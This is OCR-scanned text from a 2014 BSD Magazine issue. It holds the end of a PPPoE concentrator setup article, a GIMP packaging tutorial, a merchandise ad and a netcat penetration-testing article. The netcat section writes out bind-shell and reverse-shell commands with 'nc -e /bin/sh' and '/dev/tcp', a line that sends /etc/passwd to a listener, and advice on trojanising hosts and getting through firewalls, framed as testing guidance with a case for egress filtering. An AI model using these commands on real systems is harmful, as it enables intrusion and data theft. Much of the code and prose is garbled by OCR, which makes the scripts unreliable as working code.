Sradius”update radacct set acctstoptime=now() where acctstoptime is null and 
username='$XX';” 2> /dev/null 
echo “<hr> Customer “sxx” “dreopeed. <hr>” 
echo “<form method="link” aclion="sst >’ 
echo ‘<input type="submit” value="New guery”>’ 
echo *</ form! 
exit 0 
else 
echo “<hr> Customer invalid. <hr>” 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo form 
exit 0 
fi 
fi 
If [ o44e= 3 7] 
then 
c_user= Sradius”select username from radcheck where username=’$XX’ limit 1;” 2> /dev/null- 
if [ “echo $XX | tr [:upper:] [:lower:]~ = “echo $c_user | tr [:upper:] [:lower:]° ] 
then 
/root/scripts/drop force $XX 2> /dev/null 
echo “<hr> Customer “$XX” dropped. <hr>” 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo 7 forme” 
exit 0 
else 
echo “<hr> Customer invalid. <hr>” 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo — ioumme:” 
exit 0 
fi 
2 BSD 11/2014 
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1, 


if [ $272 =5 ] 


then 
if [ SSS = Spass ] 
then 
c user="Sradius”select Username from redcieck where tsermame—’oxx’ Limit 17 2>  /dev/null 
if [ “echo $XX | tr [:upper:] [:lower:]~” = “echo $c user | tr [:upper:] [:lower:]° ] 
then 
SUCOn Sayer eOry =p 2270 Oo oie N0G2/ £OGe/ Seni p es) Cocpemande; shy XX) MN OO > a7 
dev/null 


echo “<hr> Customer “SXX” with speed changed to “SWW”kb download and “SQQ”kb upload. <hr>” 
echo “Customer “SXX” with speed changed to “SWW”kb download and “SQQ”kb upload the 
date ‘date’.” >> /tmp/sst_log 
echo “Customer “S$XX” with speed changed to “SWW”kb download and “SQQ”kb upload the 
date ‘date’.” >> /var/log/messages 


echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="Submit” value="New guery”>’ 
echo form: * 
exit 0 
else 
Seno  <hte> Westie veaivaltdes e<iie 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo o/ foumme 
exit 0 
fi 
else 
echo “<hr> Invalid Password, this event will be logged for security reasons. <hr>” 
echo “Attempt to access invalid, password “SSS” the date “date.” >> /tmp/sst_log 
echo “Attempt to access invalid, password “SSS” the date ‘date’.” >> /var/log/messages 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New query”>’ 
echo 7 foc 
exit 0 
fi 
fi 
echo ‘<br>’ 
fi 
echo “<form method="link™ action= "ssi >” 
echo ‘<input type="submit” value="New guery”>’ 
echo io noua 


echo ‘</body>’ 
echion “</html>” 


exit 0 


#teof 
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6 Ip Tirst= echo 24 -|) Cul: =a" 5" =r." 


/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/ 


netflow/$1.ctl shutdown 
else 
c ip6=$4 
fi 


Consider 203.0.113.15:700 as the ip:port of the NetFlow 


collector. Create startup scripts: Listing 29. 
Permissions to be executable: Listing 30. 
Permissions to be executable: 


# chmod +x /root/scripts/ppp-down 


The following script overturns daily customers that have 


been blocked: Listing 31. 


Permissions to be executable: 
# chmod +x /root/scripts/drop blocked 
Add it to cron to run daily: 


# crontab -e 


00 21 * * * /root/seripts/drop. blocked 


This script serves to drop the client locally, but in a 


forced manner: Listing 32. 
Permissions to be executable: 


# chmod +x /root/scripts/drop force 


I’m using radvd to generate RA and quagga for redistri- 
bution. It could be done with rtadvd or dhcpv6; the most 


Listing 35. 
WORKER Ep ROceseee ss iy 


events { 


Nonker conmecrrons = 024, 


lances | 
include mime.types; 
default type application/octet-stream; 
seudimle ony 
ellison, loch emmsoune I. 
elation lIneechor elimeo me 1/75 
keepalive  wimeouime lo: 
sieonel iimeoulw LO), 
elle locly louie Salas OK: 
elisa Poecleic lotivee sive lice 
GIaSiMlie Iek IOs, Sas eile 


Tange pel tent wneaden  buitens Ze ik, 


server { 
listen On Os I= O0r 
listen VAG) 0) alWilseeerees Ole 


server name localhost, 


Seievere TeelSiays! (ci - 


location / { 
root /usr/local/www/nginx; 


index index.html index.htm; 


liecation /sst { 
root /usr/local/www/nginx/sst; 
nds ss t COny, 


rewrite (.*)$ /S$1.cgi break; 


BaseCg ie paso UNL: / val, Cun/ Segiyuap/ segue 


Hee SOC 4 


fastcgi param SCRIPT FILENAME /usr/local/ 


www/nginx/Sfastcgi_ script name; 
include Pastegmypatans, 
allow 203. Ur 13.69/37 > 
deny ene; 


error page 500 502 503 504 /50x.html; 
ligcations——/ 50. memilert 


root /usr/local/www/nginx-dist; 


server { 
listen 20S 05 lie Gob 
Seaver ieame  valialia, 
charset utf-8; 
location / { 


MeO ese Inteos/ 7127 10.0. ie Os) 


#eof 


VW? 
U 
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PPPoE Concentrator Dual-Stack! 


Sat Nov 22 07:40:00 2014 Bits/s any protocol 


600 M 


2 500 M 
LI 
oe 
a 
o 400 4 
+E 
= 
ms 300 M 
Li 
“ey 
Ui 
+ 300 M 
- 
a] 
160 4 


Sat 00: 68 Sat O6: 00 
81.7 Mb/s icmp: 40.4 kb/s other: 753.8 b/s 


Fri 12:00 Fri 18:00 
558.7 Mb/s tep: 476.9 Mb/s udp: 


all: 


Figure 6. nf_traffic 


Listing 36. 

auth: { 
¢ Cat / oot, , log, 10/harvester, cont Users. “acmin sy 
exports.config = { pass: “1234” 

nodeName: “pppoe”, ee 
logStreams: { ini 
Vetiver © || 
“/ Wee) log/mpda log: ; /* 
] // Enable HTTPS/SSL 
he eele 4 
server: { key: ‘/path/to/privatekey.pem’, 
INO Si Lie OF Ors, cert: ‘/path/to/certificate.pem’ 
jena? IOC I bj 
} a 
} 
#teof /* 

// Restrict access to websocket (socket.i0) 
iain GOO wWognio logusemycm «COME // Uses socket.io ‘origins’ syntax 
exports.config = { PESEPUCEDOCKeL:. Veer 

nesine= “ZO 0 cal * / 
sources IMU 
} /* 
#eof // Restrict access to http server (express) 

REST EMCEHITP: jf 
i edie COOL, slognie, weomscu vcr coms ai re oe kc 
exports.config = { ] 

laveyoh oe -cmumt le’ay end) 50) at Bee * / 
isoucies | IOS 

} 
/* teof 
// Enable HTTP Basic Authentication 
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important thing is that the mpd5 provides a connection 
via link-local client-server. It is not interesting that the 
irqs stay changing between cores of processors, so let’s 
fix them, bearing in mind that this can vary depending on 
your hardware. Create the rc for cpu_affinity: Listing 33. 

Now let’s create the cgi script for support: Listing 34. 
Permissions to be executable: # chmod +x /usr/local/www/ 


Nginx/sst/sst.cqi. 


Let’s configure sudo, otherwise you will have permission 
issues with nginx when using the SST. 
Add these lines at the end of the file: 


# vi /usr/local/etc/sudoers 
User Alias WEB = www 


WEB ALL = NOPASSWD: /usr/bin/ssh 


Let’s set nginx for support system, log system and infor- 
mative for blocked customers. 


edit: /usr local/etc/nginx/nginx cont: Listing 35, 


Listing 37. 


i woul / Us) locally cud) ce=d/ log ie 
teenmod 7559/ust/ locall/jere, red) log 10 


# cat /usr/local/etc/re.d/log io 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot) br 

#1414503716 

# REQUIRE: LOGIN 

# 

# Add the following lines to /etc/rc.conf to enable log. 
1o-server and log.io-harvester at startup 

i HOG EEO. (DOOUG woee Eo. NO) by vcderanit. 

# Set it to “YES” to enable log.io-server 


and log.io-harvester 
» /etc/ tc. subr 
name="log 10” 
Eevee SIC were Closolscs 
#rcvar=log io enable 
load Wie Feoniic = mame 


: S{log_ io enable:=NO} 


start _cmd="S{name} start” 


Create a blocked informative page, it may contain cus- 
tomer area and others, creativity is the limit! 


# vi /usr/local/www/nginx/index.html 
<html> 
<head> 
<title></title> 
</head> 
<body> 
<p? 
Customer blocked, contact the Company Lorem 
Ipsum.</p> 
</body> 
</html> 


Let’s configure postfix, edit the /etc/mail/aliases, un- 
comment the root and input your email address to re- 
ceive important information from your server. 

Run the line below to that postfix runs on localhost to 
start functioning properly: 


WT 


stop cmd="S{name} stop 


lo cul omer cncin () 
echo: “Starting log.io0-Sserver.” 


/usr/local/bin/log.io-server 2>&1 >/dev/null & 


wa 


echo “Starting log.io-harvester.” 
/usr/local/bin/log.io-harvester 2>&1 >/dev/null & 
} 


hoge Lomesewow() 

{ 

echo “Stopping log.io-server.” 

echo “Stoping log.io-harvester.” 
Jise/ oun ial node: 2>6i5 >/devz/ aul 


} 


Gums se Re ommeana ode 


#eof 


BSD 


MAGAZINE 


56 


11/2014 


PPPoE Concentrator Dual-Stack! 


Border 
Routers 


Core switch 
vlan1ol 


Radius 


Radius 


Figure 7. pppoe_en 


# postconf -e ,alias maps = hash:/etc/mail/aliases” && 
postconf -e ,inet interfaces = localhost’ && rm -rf / 
etc/mail/aliases.db && newaliases && postalias /etc/ 


mail/aliases 
Let’s set the log.io: Listing 36. Create the rc for log.io: 


Listing 37. 
Permissions to be executable: 


# chmod +x /usr/local/etc/re.d/log io 


Access your support system -> http://203.0.113.5/sst/sst 
and authentication logs -> http://203.0.113.5:666/. 
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simple topology for implementation of 
pppoe concentrator 


lf you got this far, your work is accomplished, set to run! 
For any questions | am available by email: tigoncalves(at) 
connectionlost(dot)com(dot)br. The feedback may take time 
because mail flow here is a little high, but i will reply. Con- 
tributions and new ideas are always welcome. bsd rOx! [] s 


TIAGO FELIPE GONCALVES 
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Getting to Grips with 
the Gimp - Part 9 


In the penultimate part in our series on the Gimp we will 
look at how to create a 3d package for a FreeBSD carton that 
is print ready. 


What you will learn... What you should know... 
¢« How to manipulate images like a design pro « General PC administration skills 


spective tool that could potentially used for packaging any 
product. The key to this is accuracy and scaling, as any mis- 
match will ruin the final image. 


n this tutorial we will create a realistic 3D object using the per- 


Download the images from Table 1. 
Table 1. Details and credits 

Resource URL Details and credit 
FreeBSD website | https://www.freebsd.org/logo/logo-basic.png | FreeBSD Logo and fonts 
CPU core http://www.freeimages.com/photo/759887 Gold roubles 

10 russian gold roubles 
and CPU by styf22 
Power button http://www.freeimages.com/photo/675014 Power Button 

Hard drive power button 
by jmonte 
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Getting to Grips With the Gimp - Part 9 


Step 1 ne a ee 

Open the CPU image [Figure 1]. Wée@aAates | 
SBBAMRA | 
Ob # / S\#|\& 
a 2 a aoe 4 


7 8 ! 
> | _-—. i 
a 
o 2 & ¥ 
Step 2 Beer r,s e | 
. . nf @aA & @ 4 | 
Rescale the image to 2800px with the _ = BAS SAG 
constraint disabled [Figure 2]. Ans/aza } 
3682 @ 4 w@ @ 
= 
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Step 3 

Select Layer — Layer to image size. 
Use the colour picker tool, select a re- 
gion in the core of the CPU and fill the 
right hand side of the expanded image 
[Figure 3]. 


Step 4 

Create a new layer and click back on 
the original layer. Select some CPU 
pins from the lower left hand side us- 
ing the lasso tool, copy the selection 
and paste into the new layer. Tempo- 
rarily reduce the opacity of the layer 
while aligning so you can overlay the 
pins accurately [Figure 4]. 
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Getting to Grips With the Gimp - Part 9 


Step 5 

Open the FreeBSD logo image and 
select and copy the transparent Red 
Daemon sphere. Create a new layer 
in the CPU image and paste the re- 
sult. Click on the scale tool and en- 
sure the constrain is enabled. Scale 
the image to neatly overlay the coin 
[Figure 5, 6]. 


Step 6 

Add a new layer. Hide all the other lay- 
ers. Copy the transparent FreeBSD 
text in black into the new layer. With 
constrain enabled, scale to 1500px 
and anchor the layer. Add a new layer. 
Set the foreground colour to #ff3300, 
select a square bounding box around 
“BSD” and fill with red. Repeat with 
the “Free” text and fill with white. Set 
the layer to Addition. Reveal the other 
layers and move the FreeBSD text to 
the edge of the CPU die. Select Layer 
— Layer to image size [Figure 7]. 
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Step 7 

Set the resolution of the image to 300 
pixels/in in both axis (Image — Scale). 
Create a new image with the same 
resolution 760 x 3884 pixels. Select 
the light and dark blue from the left 
hand side of the original image using 
the pick tool and set the foreground 
and background accordingly. Switch 
to the new image and use the gradient 
blend tool to fill the new image [Fig- 
ure 8]. 


Step 8 

Scale both the side and front images 
to 50% constrained. Open the hard 
drive light image and use the clone 
tool to remove the symbol engraved 
on the right hand side. Crop so that 
the switches are central [Figure 9]. 
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Getting to Grips With the Gimp - Part 9 


Step 9 

Add a new layer to the side image and 
paste then scale the switches so they 
line up in the centre of the image. Add 
“The power to serve’ text adjusting 
the kerning and size to fix the maxi- 
mum width. Set the switch layer to 
hard light [Figure 10]. 


Step 10 

Merge visible layers on both imag- 
es. Create a new page with a white 
background 3000 x 2500 px. Add a 
guide at 50% of the vertical (Image 
— Guides by percent). Add a horizon- 
tal guide part way down the from the 
top of the page. Create two new lay- 
ers, copy and paste the side image 
and front images into separate layers. 
Add two vertical guides one aligned 
against the 'P' and one intersecting 
the “S” [Figure 11]. 
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Step 11 

Click on the left hand layer and using 
the square selection tool, outline the 
left hand panel. Click on the perspec- 
tive tool and alight the vertical axis to 
match the left-hand guide then click 
on Transform. Anchor the layer. Re- 
peat with the right hand panel and the 
right hand guide [Figure 12]. 


Step 12 

Merge down the two layers, and add 
a shadow with 0 x offset and 20 y off- 
set and blur radius. Give the shadow 
a 40% opacity. Crop and export as re- 
quired [Figure 13]. 


ROB SOMERVILLE 

Rob Somerville has been passionate about 
technology since his early teens. A keen advo- 
cate of open systems since the mid-eighties, he 
has worked in many corporate sectors includ- 
ing finance, automotive, airlines, government 
and media in a variety of roles from techni- 
cal support, system administrator, develop- 
er, systems integrator and IT manager. He 
has moved on from CP/M and nixie tubes but 
keeps a soldering iron handy just in case. 


BSD 


MAGAZINE 


64 


GRAPHIC DESIGN 


# « i 


11/2014 


Great Specials 


On FreeBSD®° & PC-BSD® Merchandise 


229.95 


PC-BSD 9.1 DVD 


239.95 


FreeBSD 9.1 Jewel Case CD Set 
or FreeBSD 9.1 DVD 


Styli Dress Attive 


The PC-BSD 9.0 Users Handbook 


Give us a call & ask about our 
COFTWARE BUNDLES 


1.925.240.6652 


299.95 


The FreeBSD CD or DVD Bundle 


Inside each CD/DVD Bundle, you'll find: 
Frocks Handbook, 3rd Edition 
Users Guicke FreeBSD Handbook, Jed Edition, Admin Guicke 
FreeBSD 9.1 CD or DVD set 


249.9 


PC-BSD 9.1 DVD 


FreeiD Toolkit Ovi 


Pal Look Your Professional Best 


a 
Apparel 


Stay Warm in Zip Ups & Pullovers 


FreeBSD 9.1 Jewel Case CD/DVD............... naeaes $39.95 


CD Set Contains: 

Disc 1 Installation Boot LiveCD (i386) 

Disc 2 Essential Packages Xorg (i386) 

Disc 3 Essential Packages, GNOME2 (i386) 

Disc 4 Essential Packages (i386) 
Pe cc desssstcsesscecit vceasesae beens uesrecdesanonaceeadeonenuarasaacitndatasivads 
PEGE SD OVD vrdsccicitis ta eeerteititeceeebnenagcn SO 


FreeBSD Subscriptions 
Save time and $$$ by subscribing to regular updates of FreeBSD 


FreeBSD Subscription, start With CD 9.1 wu. cscecssesseeseesresneen 929.95 


FreeBSD Subscription, start With DVD 9.1 woe seseseenee 929.95 
FreeBSD Subscription, start With CD 9.0.......sssssserssesseneseevenens $29.95 
FreeBSD Subscription, start With DVD 9.0 .......ssssseressssenesnenenrs 0929.95 


PC-BSD 9.1 DVD (Isotope Edition) 


PLAB SE) SUBS CH Pt vesiianiieecennateceansiqnaenanntanenanm $19.95 


Just Plate Fur 


Mousepads & Novelty Homns 


fo™ 


~\ 
t 
| ; E | 
| “ N J : 


T-Shirts 


Lots of Styles to Choose From 


The FreeBSD Handbook 
The FreeBSD Handbook, Volume 1 (User Guide) .............000 $39.95 
The FreeBSD Handbook, Volume 2 (Admin Guide)................ $39.95 


The FreeBSD Handbook Specials 


The FreeBSD Handbook, Volume 2 (Both Volumes).............. $59.95 
The FreeBSD Handbook, Both Volumes & FreeBSD 9.1 ........ $79.95 
PC-BSD 9.0 Users Handbook uu... ccccccssssssse $24.95 
sho] DE" FL et- +4 | | | - nS IS?) 
The FreeBSD Toolkit DVD ow ssssssnneee $39.95 


t reeBSD Mousepad SESH ASSAESAEEAEEEEEEE EEE EEE EEE EERE ERE ERE EEE EE * fibre $1 0.00 


FreeBSD & PCBSD Cap uu... .oceccccccessssssssssssssssssssessesssesseee 920.00 


BSD Daemon Horns Sapaviiganiévarsdtsdivuenssdienacshciiaiticandaiehsesiteatnaiasiatonneaan Coan 


PANORAMIC 
PHOTOGRAPHY 
IP SDD es 


sl 
For even MORE items 
visit our website today! 


www.FreeBSDMall.com 


BSP Magazine 


Available Mlontihy 


100+ Unix Commands 


Pen Testing and Audit. Part 3 


Pen Testing and Audit. This comes in handy when engaged 
in a penetration test. In the event that you find a shell, it 
may not be feasible to upload large amounts of data, but 
netcat is small (and also exists natively on many UNIX/LINUX 
systems). Next, there is a port of Netcat for Windows. This 
means that it can be loaded into a Windows network over a 


shell exploit. 


nce on the internal host, you can extend what you 
have done by scanning the internal network — IN- 
SIDE the firewall. 


Netcat - the tester’s best friend 

Sending to and from separate hosts is possible. The idea 
here is to have netcat setup as a listener on the host that 
is collecting the data and for it to be running on a host that 
is spoofing * the source address. The “-s” address local 
source address option and the fact that netcat has the “-g” 
source-routing hop point options add to this ability. 

The “-wN” usage options defines the buffered send- 
mode that selects one line every N seconds. Another op- 
tion that can be considered is to hexdump (to stderr or to 
a specified file) of transmitted and received data. 


Vulnerability Scanning with Netcat 

Netcat has a number of pre-existing scripts that can allow 
it to act as a simple vulnerability scanner. It does this by 
connecting to the port to be tested, entering data to test 
a vulnerability and returning the result. A number of the 
commonly available test scripts include those for: 


1. RPC (Remote Procedure Calls) — both the *NIX (Port 
111) and Windows (Port 135) versions 

2. FIP (proxy tests, PASV bugs, etc.) 

3. Password testing (along the lines of Brutus) — that is 
you can try a dictionary attack and test a system's 
passwords 
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4. Map and export a file system 

5. Test trust relationships (Such as the “R” commands) 

6. SSL -— yes there is an SSL capable version of netcat 
and it can be used to test SSL links 

7. A Web and CGI scanner 

8. Many more ... 


Reporting the results is another issue; you know that the 
vulnerability is there, the output is just not pretty. 

Then there is scripting again: 
# “perl -e ‘print “A”x1024'° nc -v 
A little fuzzing never hurt... But then again... In the perl 
sample above, we see how we can send large volumes 


of script to a listening port. This all goes to show how a 
simple command can be made into a truly powerful tool. 


Testing and making connections to open ports with 
Netcat 

When testing a system, netcat has a few things you should 
remember: 


¢ Itis faster than a speeding Telnet. 

¢ Easy to drop with a CTRL-C 

¢ Handles raw data in a single bound 

Yes, it’s not a bird or a plane, it is netcat. Netcat is far 


faster than Telnet without the overhead and translation. 
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This makes it superior for forensic data transfers. Unlike 
Telnet, netcat does not add characters. 

Next, netcat can connect over UDP. This means it can 
be used as a simple “Telnet” client and server — even over 
UDP. You set up communications as follows: 


On the Server: 


¢ ne =—1, =p [port] <—e /binycsh 
Or in Windows — 
cmd.exe’. 

lf the aim is to have a UDP “telnet” style client over UDP 
53, just run: 


“C:\ nc -l -p [port] -e C:\windows\ 


7 ne: -l. =U. =p 53 -e /bin/esh 
Can we say a simple backdoor? 


On the Client: 


# nc [ServerIPAddress] [port] 
So to connect to the listener above on UDP 53 at IP ad- 
dress 192.168.10.123 we would use: 


Pome —U) 1o2..16b. 10.12 3°> 5S 


It is all really easy when you think about it. This is why 
it is SO EASY to bypass firewalls and routers that allow 
DNS traffic (or any default rules). This is why it is CRITI- 
CAL that there are restrictions on all rules that have ANY 
system to ANY system access. 


Acting as a virtual server or honeypot 

Netcat can simulate any TCP or UDP service; the binary 
ones are far more complicated, but are still possible. If we 
take the simple example of a Web server that we wish to 
create as a honeypot, the process is to serve a page and 
log the results. 


Make a webserver: 

while true; do nc -l -p 80 -q 1 < /tmp/index.html; done 
Run the script line above, then you could log the netstat 
and other packets, setup snort, etc. Or you could inte- 


grate logging: 


cat { while read; do echo “’date’ > SREPLY”>> log.txt; 


echo SREPLY; done; } nc -l =p 80 <q 1 < /tmp/index. html 
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{ while read; do echo “‘date’ < SREPLY” >> log.txt; 
echo SREPLY; done; } 


To add a proxy or client header and fool simple systems: 


# nc google.com 80 GET / HTTP/1.1Host: google.comUser- 
Agent: Mozilla Version 2800.1 (one day)Referrer: Not. 


my.site.com 


To make a log with times, etc., the script needs to be spawn’d 
— but the idea is there. This can be done for nearly any service 
or port but, of course, there are always simpler ways to do this. 


Netcat - the simple port-scan logger 

The following is a small script to make Netcat into a sim- 
ple Port Scan Logger. A little more and it can become 
a simple Honeypot: 


# while true; do nc -1 -p [port to monitor] -e /bin/ 


record.sh >> /tmp/port_connections.txt 


This calls a script, /bin/record.sh. There are other 
ways to do this, but this is a quick and easy example. 
This script is as follows: 


#!/bin/sh 

# port _mon.sh 

# Netcat script to record port scan details. 

# 

cat { while read; do echo “’date’ > SREPLY”>> log.txt; 
Scho SREPLY, done; } neveat. =v =v +l. “w 3 [porc.. 

monitored] { while read; do echo “‘date < SREPLY” >> 


log.txt; echo SREPLY; done; } 


This logs all connections to a single port from an IP ad- 
dress. This is a continuous loop. That is, when a connec- 
tion is made, netcat will be respawned and ready to re- 
cord another attempt. 

Alternatively, we can log to syslog by adding: 


“echo ‘*<Q>message’ ne -w 1. -uw log host. 514” 


Now, if we want to monitor several ports, a little extra 
scripting and we have a simple port scan monitor. 


(for f in $(seq 1 254); do while true ; do nc -v -w3 -z 
Sf; done) 


Netcat to send files 


Netcat helps in sending files. We can tar and compress 
(or gzip) the files contained within a specified directory 
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and then pipe the data through a netcat client. The “—w” 
option can provide a few seconds of delay prior to a time- 
out. This covers the problem of temporary disconnects 
and intermittent traffic flow. 

To move the file from a listener to the netcat client we 
first need to configure a listener. 


# nc -l -p 53 < /tmp/the file name.bin 
Next, a client. 
#nc [IP Address of Listener] 


Pushing a file from the client to the netcat listener. 
Again, we setup a listener. 


# nc -l1 -p 53 > /tmp/the file we want to copy.bin 
And the client. 
#nc [IP Address of Listener] 53 < /tmp/The File we saved.bin 


This is just the reverse of what we did at first. This allows 
the sending or receiving of files. These files are sent in 
binary format, but this also allows text to be sent. Some 
issues can occur (and require translation) when sending 
from *NIX to Windows. 


Netcat is also able to be used as a Forwarder and Relay 
| am not going to go into detail here but, if you think about 
it, there is no reason why a single netcat listener is the end 
of what you can do. Chaining netcat can allow it to pass 
multiple layers and systems. In Pen-tests, Red Teaming 
and even on the darker side of the fence, this technique is 
used to “drill” through firewalls and security systems. 

More than this, netcat can chain across different pro- 
tocols. It is possible to pipe one connection type into an- 
other. A connection to DNS (UDP 53) can be changed to 
HTTP (TCP 80), etc. 

All of this just touches the surface of what netcat does. 
| would suggest that you search and find out more. There 
are always more uses of netcat. 


Netcat as a Trojan 
Netcat can also be used as a backdoor into a system and 
a remote shell. It is all too easy... 

Once you have run the script on the host that you wish 
to Trojanise, use telnet to connect to it as follows: 

The following starts netcat in listen mode. 


#nc -l -p [port] -e /bin/ksh 
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Of course, you can listen on either TCP or UDP. In fact, 
adding this line to a start-up script could allow you to se- 
lectively send connections to a valid service or the “Trojan”. 

For instance, if you can obtain shell access through 
a DNS vulnerability with BIND, you could load a netcat 
startup and allow future access while patching the issue 
to stop further attacks. Even simple tools can be used in 
both positive and negative ways. 


A replay attack engine 
Netcat can be used as a replay attack engine. It works 
well for this purpose and is simple to use. The first part is 
to actually collect the information stream (the data) that 
you want to replay. This can be done by using another 
tool to create the stream or just capture (tcpdump or wire- 
shark) a stream and alter the parts that do not fit. 
Change the times, IP addressing, destinations, values, 
etc. to make the captured stream suit what you want. 
To replay the data, netcat in client mode will suffice: 


S cat file.capture.bin nc [destination IP] [port] 


or even: 


S$ nc [destination IP] [port] <> 
Either will work. Either netcat in listen mode, tcpdump, 
wireshark or tcprelay can be used to make the initial 
capture. TCPRelay works better for this task, but netcat 
just looks cooler (in a geek sense). 

Hence, netcat can be used to replay packets. 


Egress filtering and netcat 

First | had better explain to everyone what Egress filters 
are. Most people understand the idea of Ingress filtering. 
This is stopping things coming into the network. Most peo- 
ple will agree that letting anything into the network from 
the Internet willy-nilly is a bad idea. But what are Egress 
filters and why are they necessary? 

An Egress filter is a block on traffic leaving your net- 
work. This may not sound too nefarious, but it is not just 
the insiders who can damage your network from the in- 
side. An external attacker can “push” a session from the 
client to a listener. That is they can make a shell connec- 
tion from your server using outgoing traffic to get an in- 
coming connection to your internal systems. 


Shoveling a shell 

You may think that it is not possible to get an incoming 
shell from the Internet because you block incoming traf- 
fic. If you do, you are mistaken. There is an attack method 
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known as shoveling a shell or just a shoveling shell. Net- 
cat is acommon tool for launching this attack. The attack- 
er would setup netcat as follows: 

Listener: 


ne: -=1 =p [port no] 


Client: : nc [listenerIP] [port] -e /bin/sh 

The firewall will see this as an outgoing connection from 
the system. It is, in reality, an incoming interactive shell. It 
is also a common way of using that buffer overflow con- 
dition — take your pick of the latest one hitting the streets. 

Generally, the client is activated at regular intervals 
through cron. This is completed by activating a netcat 
server and waiting for the connection from the system 
being attacked. The system being attacked is generally 
configured using a common port that is generally allowed 
through your firewall and expected. Ports such as TCP 25 
(SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. 
If the attacker is really smart, they will tie the connection 
to UDP and bind it to something like UDP 53 (DNS) as it 
is rarely blocked. (nc -u: UDP Mode). 

The result — the attacker has a command shell to your 
system through your firewall. This even works on firewalls 
that block ALL incoming traffic. As a tester, you can do the 
same, as packet filters are easily fooled, a good proxy lev- 
el firewall is not — but there are fewer and fewer of these 
being used. 

The worst thing, is that tools such as metasploit (hittp:/ 
www.metasploit.com/) make this even easier. They bun- 
dle the exploit and tools into a single payload that even a 
novice script kiddie can use. So filter that outgoing Inter- 
net Traffic before it is too late! 


Oops - | forgot to install netcat... 

Netcat does not exist on all systems. It is common on ma- 
ny Linux systems, but less commonly installed on UNIX. 
In the event that netcat is not installed as a client program 
on a system, and when we cannot install netcat, there are 
options in both /dev/tcp and /dev/UDP: 


/dev/tcp/[IPaddress] / [port] 
/dev/ucp/ [IPaddress]/ [port] 


So for our UDP 53 example this becomes: 
/dev/ucp/192.168.10.123/53 
For the shell this becomes: 


0<&1l 2>&1 
0<&1l 2>&1 


/bin/csh -i > /dev/tcp/[IPaddress] / [port] 
/bin/csh -i > /dev/ucp/[IPaddress]/ [port] 
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And hence, we can obtain the functionality of netcat with 
the tools and devices that exist on any *NIX system. As 
an example, the script line below shovels a shell from 
the target host to a waiting Netcat listener. We can enter 
commands on the host that act as a reverse shell. 


/Din/ cen —1 -> (dev/ucp/192.168.10.123/53 0<el 2oe1 


The critical point is that we can use netcat on our local 
system even when the remote system under test does 
not have netcat. And, of course, if netcat is not installed 
on the client, we can still use a makeshift client such as: 


# cat /etc/passwd> /dev/tcp/[IP_ Address of Listener] / 


[Listener Port] 


Filtering connections 

An exercise to try is to setup restrictions on the source IP 
that is allowed to connect. Netcat can be configured to 
accept connections only from a predefined source IP ad- 
dress. This makes the connection operate like TCP_Wrap- 
pers and is seminal to a firewall for the individual service. 


Sending compressed files 

In this example, the data received is piped into tar. By 
running tar with the “v” option (or verbose) we can see 
the filenames — they are printed to SDOUT (generally the 
screen). Omit this if you want to script this or otherwise 
automate this process (less noise). To compress the out- 
put, also run tar with the “z” flag. This will automatically 


run the gzip compression program over the output. 


Note 

Not all implementations of tar support the “z” flag and 
it may be necessary to pipe the tar’d output to gzip in 
a separate step. 


To do this we use the commands: 


Client 
# tar cfpz - /[directory path]/[File] /bin/nce -w 3 [Desti- 
Wation Host: IP]. [iistensr-Port] 


or for an entire directory, just: 


# tar cfpz - /[directory path] /bin/nc -w 3 [Destination _ 
Host. IP] .[i1stener-Porc] 


Listener 


# nc -l -p [Listener-Port] tar xfpvz - 
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On the listener we reverse the process in this example 
and restore the files. 

For the details on how to use tar see: http:/www.linux- 
command.org/man_pages/tar1.html. 


Alternatively 

Together, dd and netcat make a great way to either back- 
up a system (and all slack, etc.) or to remotely obtain a fo- 
rensically sound copy of a partition, drive, memory, etc. 
Say we want to make an image of /dev/hdb1 (a partition, 
but the entire drive can also be copied with /dev/ndb), we 
can use the following commands: 


Client 

# dd if=/dev/hdal nc -v -w 15 [Netcat Listener IP] 1200 
Listener 

# nc -l1 -v -w 15 -p 1200 dd of=/tmp/image hdb.dd 


There are other options with dd that can be incorporat- 
ed and | have these in other posts. In this case, | have 
used TCP 1200 as the port, but this can be anything that 
is not in use. Also, UDP can be used, as well, but there 
is a larger chance of error. 

This image can now be cloned to other hosts, used as 
a backup to be restored to the original, if needed, or used 
for forensic analysis. You can also test the system remote- 
ly without leaving a further trail. 


DD 
DD is the Swiss army knife of file tools — with /dev/tcp it 
can also be a network tool (but nc is simpler). 

First we need the basics for DD. For this we have the 
man page and some definitions. | have taken (blatantly 
paraphrased) the man file info for DD and included this 
below (which is simple to obtain — “man dd”). 

For the purpose of a task such as reversing files and swap- 
ping them, we need to concentrate on the following options: 


¢ bs — This is block size. Setting “bs=1” means that 
we can use dd as a bit level (instead of a block level) 
tool. Although it does slow down the process from a 
block copy, we are not looking at how fast we can co- 
py here. 

¢ skip — this tells us to skip “n” blocks. In our case, we 
want “n” bits. 

What we are going to do is start at the value of “n” set to 

our last bit in the file. We will loop the dd function to next 
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copy bit “n — 1°, then “n — 2’, ... to “n=1". This means n 
gets copied to bit 1, “n — 1” to bit 2, ..., bit 1 to bit n. 

In other words we need to copy bit “n — 1” in the source 
file to bit “i— n” in the destination file. 


How to reverse a file with dd 
Reversing a file is actually fairly simple, a small shell script 
code executed with the length of the file (based on the 
sector size) is all that is required. You can either use a de- 
fault block size (where the individual blocks will be moved 
into a reverse order), or set the block size to 1 in order to 
completely reverse the file. The flag, “bs=1” is added in or- 
der to copy the entire file in reverse — bit by bit. 

lf the size of the file and its name are known beforehand, 
the script is particularly simple (note that this script uses the 
‘count command, which is not found on all systems): 


°j) = [file size] 

SF=[file to copy] 

for 2. in. “count 0 37°} do 

dd conv=noerror bs=1 count=1 skip=($i) if=SF > /($j).out 


done 


In the event that you do not know the size of the file, 
the following script can be used, or if you want to in- 
corporate this in to a script that changes multiple files 
at once you need to feed more information into the 
script (including a file descriptor). This script is a lit- 
